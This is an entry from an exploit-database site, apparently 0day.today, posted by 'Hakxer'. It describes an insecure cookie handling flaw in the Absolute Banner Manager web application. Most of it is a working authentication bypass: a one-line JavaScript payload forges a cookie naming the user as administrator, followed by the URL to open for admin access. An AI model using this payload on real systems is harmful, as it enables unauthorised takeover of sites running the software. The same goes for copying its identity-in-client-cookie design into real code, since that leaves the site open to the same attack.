[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Absolute Banner Manager Insecure Cookie Handling Vulnerability

Author
Hakxer
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3973
Category
web applications
Date add
31-10-2008
Platform
unsorted
==============================================================
Absolute Banner Manager Insecure Cookie Handling Vulnerability
==============================================================


[~] Author : Hakxer
[~] Type Gap : Insecure Cookie Handling
[~] script : Absolute Banner Manager [see script] http://www.xigla.com/absolutebmnet/demo.htm
[~] Team : EgY Coders 
#################################################################################################

Exploit : First go to http://www.xigla.com/absolutebmnet/demo/login.aspx
Second Execute JS Code 
[~] javascript:document.cookie="xlaABM_usr=userid=administrator&company=Sytem Administrator";
Now Go to http://www.xigla.com/absolutebmnet/demo/menu.aspx

--- Proud To Be A Muslim ---

# _=END=_ #



#  0day.today [2024-07-07]  #